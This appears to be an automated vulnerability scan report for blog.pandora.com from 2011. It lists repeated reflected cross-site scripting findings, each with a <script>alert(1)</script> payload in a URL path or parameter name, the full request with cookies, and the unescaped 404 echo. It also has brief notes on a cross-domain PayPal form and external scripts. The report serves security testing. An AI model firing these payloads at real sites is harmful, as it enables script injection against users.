<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1697<script>alert(1)</script>1beb0083bf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2be7b<script>alert(1)</script>5fa8c585472 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad328<script>alert(1)</script>2f7a6237729 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 was not found on this server.</p> ...[SNIP]...
1.434. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.pandora.com
Path:
/pandora/assets_c/2010/11/sd
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a53ff<script>alert(1)</script>c919746079d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1c19<script>alert(1)</script>6a443b18f71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1051<script>alert(1)</script>6df0b546c02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6f7<script>alert(1)</script>7fd9127d43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d65d<script>alert(1)</script>64c6f95a91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea349<script>alert(1)</script>9480ff2f53c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffb3<script>alert(1)</script>60fe94bbc36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a52fa<script>alert(1)</script>042e399b16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdcd4<script>alert(1)</script>10f75eed66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a34c<script>alert(1)</script>3ef283336f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5dd40<script>alert(1)</script>d3e39760b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711ea<script>alert(1)</script>7529f0abeb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /press711ea<script>alert(1)</script>7529f0abeb0 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /press711ea<script>alert(1)</script>7529f0abeb0 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98567<script>alert(1)</script>eadbbafd7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show98567<script>alert(1)</script>eadbbafd7b9 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show98567<script>alert(1)</script>eadbbafd7b9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33cf5<script>alert(1)</script>c76f8eb676e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show33cf5<script>alert(1)</script>c76f8eb676e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show33cf5<script>alert(1)</script>c76f8eb676e/ was not found on this server.</p> ...[SNIP]...
The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
cmd
business
item_name
bn
add
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /pandora/archives/2007/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:26:03 GMT ETag: "7cc51b-9333-498819d3bfcc0" Accept-Ranges: bytes Content-Length: 37683 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
